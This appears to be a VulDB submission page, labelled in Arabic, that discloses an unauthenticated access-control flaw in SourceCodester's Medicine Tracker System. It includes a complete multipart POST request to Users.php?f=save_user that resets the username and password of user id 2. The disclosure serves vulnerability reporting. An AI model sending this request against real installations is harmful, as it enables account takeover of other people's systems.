| عنوان | Medicine Tracker System Improper Access Control |
|---|
| الوصف | An Improper Access Control has beed discovered in Medicine Tracker System. A remote and unauthenticated attacker can exploit this vulnerability by sending a crafted request, successful exploitation could allow attakers to change any users username and password.
The vulneravle URI is POST /php-mts/classes/Users.php?f=save_user. When the value of ' name="id" ' is correct, then an attacker could change the related username ,password and other informations. Cookie is not necessary for this operation, which means attackers could exploit it without authentication.
An malicous request is below
POST /php-mts/classes/Users.php?f=save_user HTTP/1.1
**********************************************************
------WebKitFormBoundaryPE5dieOmOyIpLQ4Z
Content-Disposition: form-data; name="id"
2
------WebKitFormBoundaryPE5dieOmOyIpLQ4Z
Content-Disposition: form-data; name="firstname"
a
------WebKitFormBoundaryPE5dieOmOyIpLQ4Z
Content-Disposition: form-data; name="middlename"
b
------WebKitFormBoundaryPE5dieOmOyIpLQ4Z
Content-Disposition: form-data; name="lastname"
c
------WebKitFormBoundaryPE5dieOmOyIpLQ4Z
Content-Disposition: form-data; name="username"
foo
------WebKitFormBoundaryPE5dieOmOyIpLQ4Z
Content-Disposition: form-data; name="password"
foo123
------WebKitFormBoundaryPE5dieOmOyIpLQ4Z--
Then the relevant user with id=2 will be set as foo/foo123 |
|---|
| المصدر | ⚠️ https://www.sourcecodester.com/php/16308/medicine-tracker-system-php-oop-and-mysql-db-source-code-free-download.html |
|---|
| المستخدم | WWesleywww (UID 43117) |
|---|
| ارسال | 17/03/2023 09:18 AM (3 سنوات منذ) |
|---|
| الاعتدال | 17/03/2023 12:19 PM (3 hours later) |
|---|
| الحالة | تمت الموافقة |
|---|
| إدخال VulDB | 223311 [SourceCodester Medicine Tracker System 1.0 Users.php?f=save_user firstname/middlename/lastname/username/password توثيق ضعيف] |
|---|
| النقاط | 20 |
|---|